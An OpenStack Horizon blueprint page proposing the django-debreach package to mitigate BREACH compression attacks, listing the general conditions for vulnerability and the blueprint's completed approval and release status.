OpenStack Dashboard (Horizon)

mitigate breach attacks using django-debreach

Registered by Nishant Kumar

BREACH is a category of vulnerabilities and not a specific instance affecting a specific piece of software. To be vulnerable, a web application must:

  * Be served from a server that uses HTTP-level compression
  * Reflect user-input in HTTP response bodies
  * Reflect a secret (such as a CSRF token) in HTTP response bodies

Since horizon falls under this category, we can include django-debreach module within horizon as a requirement which provides mitigation against the breach attacks.

https://github.com/lpomfrey/django-debreach

CSRF token masking is a built-in feature within Django 1.10+, therefore only content-length modification feature provided by django-debreach can be enabled.

Blueprint information

Status:
Complete
Approver:
Ivan Kolodyazhny
Priority:
Medium
Drafter:
Nishant Kumar
Direction:
Approved
Assignee:
Nishant Kumar
Definition:
Approved
Series goal:
Accepted for 15.0.0-stein
Implementation:
Implemented
Milestone target:
milestone icon stein-1
Started by
Akihiro Motoki
Completed by
Akihiro Motoki

Related branches

Sprints

Whiteboard

Gerrit topic: https://review.openstack.org/#q,topic:bp/mitigate-breach-attacks,n,z

Addressed by: https://review.openstack.org/596549
    Add django-debreach to horizon

(?)

Work Items

Nearby

This blueprint contains Public information 
Everyone can see this information.
Edit subscription

Subscribers

No subscribers.